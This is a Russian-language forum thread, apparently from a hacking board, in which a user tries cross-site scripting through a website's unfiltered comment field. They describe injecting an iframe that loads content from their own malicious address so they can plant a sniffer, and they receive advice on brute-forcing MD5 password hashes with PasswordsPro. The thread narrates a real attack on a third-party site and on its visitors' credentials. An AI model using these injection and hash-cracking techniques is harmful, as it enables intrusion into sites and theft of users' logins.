Ломаный javascript
 

Проблемка!
В комментарии некоева сайта можно вставить html-тэги!....... Но при вставлении элементов javascript в исходнике получаеться;

<s_c_r_i_p_t></s_c_r_i_p_t>

И естественно алерт отопражаеться как текст!

Пробовал заменять другой кодировкой словa!
Не выходит!

Есть у кого нибудь соображения по этому вопросу?

Зашифровывать пробовал? В шестнадцетиричный код, например.

Пробовал не катит!

посмотри тут, мож чтонибудь подойдет http://antichat.ru/crackchat/HTML/

Лучше тут посмотри http://ha.ckers.org/xss.html

Спасиба! но я сам нашёл выход из ситуации!

Так как Вставка html-элементов не фильтруеться!

Я вставил фрейм такого содержания!

<iframe style="height=240;width=320" src="мой_адресок_с_поганью"></iframe>

Пойду теперь Сниферок втыкну!

Если не сложно следующий вопрос мой будет таков!

Можно ли каким нибудь способом md5 хеш превратить обратно в пароль? Или нет?

можно перебором, http://forum.antichat.ru/thread26983.html и прога Passwordspro, в ней думаю раберешся :).

InferNo23, Спасиба!